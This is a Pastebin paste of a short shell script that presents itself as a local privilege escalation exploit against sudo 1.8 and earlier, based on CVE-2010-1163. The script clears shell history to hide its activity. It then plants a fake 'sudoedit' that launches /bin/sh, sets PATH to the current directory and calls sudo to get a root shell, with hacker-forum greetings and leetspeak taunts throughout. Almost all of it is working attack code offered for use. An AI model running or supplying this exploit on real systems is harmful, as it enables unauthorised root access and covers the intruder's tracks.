API tools faq
paste
blogfakessh

#localroot

blogfakessh
Dec 26th, 2015
214
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.02 KB | None | 0 0
raw download clone embed print report diff
  1. #!/bin/sh
  2. # the return of local privilege escalation through PATH manipulation
  3. # Bug re-discovered by VipVince #HF
  4. # VipVince 2013
  5. # Thanks LevelUp @HF for rbash help, irish br0z for life
  6. # http://www.hackforums.net/member.php?action=profile&uid=7807
  7.  
  8. echo "      ################################################
  9.      # sudo <= 1.8 priv esc (based on CVE-2010-1163)#
  10.      #      - VipVince #greetz to HF (2013)         #  
  11.      #         4b0u7 t0 dr0p r007 5h3ll!!           #      
  12.      ################################################"
  13.  
  14. echo "0day0day0day0day0day0day0day0day0day"
  15. echo "f1r57 w3 br34k 0u7 0f rb45h"    
  16. history -c # clear it homie                                                                    
  17. export HISTFILE="~/.bashrc"                                                    
  18. export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin"
  19.  
  20. echo "/bin/sh" > sudoedit
  21. chmod +x sudoedit
  22. id
  23. export PATH=.
  24. /usr/bin/sudo sudoedit /etc/hosts
  25. id
  26. echo "1f y0u 4r3 n07 r007, 7ry 4g41n 5k1dz"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!